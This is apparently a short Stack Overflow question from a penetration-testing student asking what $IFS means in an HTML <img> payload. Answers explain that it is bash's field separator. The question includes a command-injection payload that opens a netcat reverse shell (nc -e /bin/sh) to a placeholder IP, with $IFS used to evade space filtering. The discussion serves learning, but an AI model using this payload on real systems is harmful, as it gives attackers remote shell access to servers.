# javascript <img> $IFS meaning

Tags: javascript

Im studying penetration testing, i know its not the place for this but i have some question about javascript,

```
<img src=http://IP/$("command"$IFS"command"$IFS)>
```

i want to know what $IFS means?
This is the actual command i want to execute:

```
<img src=http://ip.address/$(nc.traditional$IFS-e$IFS/bin/sh$IFS'ip.address'$IFS'1234')>
```

I have searched in java script documentations but did not find anything. Sorry if its not related to Stack overflow.

Comment: That's not related to JS itself, but more to the templating engine or server side code used to create the HTML here.

Comment: I have figured that out, $IFS is Internal field separator in bash, default is white space.

Answer (score 0):

It is about bash not java it means to give space between the command words..